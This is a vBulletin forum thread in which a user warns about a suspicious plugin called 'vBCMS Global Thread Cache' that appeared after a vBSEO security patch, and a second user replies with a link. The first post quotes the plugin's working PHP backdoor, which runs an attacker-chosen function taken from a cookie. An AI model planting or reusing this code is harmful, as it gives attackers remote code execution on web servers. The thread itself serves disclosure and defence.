Security issue: Plugin vBCMS Global Thread Cache, what is it and how dangeruos is it?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Alan_SP
    Senior Member
    • Nov 2009
    • 118
    • 3.8.x

    [Forum] Security issue: Plugin vBCMS Global Thread Cache, what is it and how dangeruos is it?

    I received notice about security issue with vBSEO: http://www.vbseo.com/f5/vbseo-securi...release-52783/

    And after patching it, I noticed this plugin:

    vBCMS Global Thread Cache

    Code in it is this:

    PHP Code:
    /* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20); 
    This is reported in this post: http://www.vbseo.com/f5/vbseo-securi...tml#post325579

    But, it seems that this plugin appeared to users who already had patched version of vBSEO, so it seems that this plugin was somehow inserted through different channels. I want to alarm you about this plugin and potential security problem. Please, investigate it further.
  • galerio
    Member
    • Jan 2011
    • 60

    #2
    read here https://www.vbulletin.com/forum/show...Default-Plugin

    Comment

    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
    Working...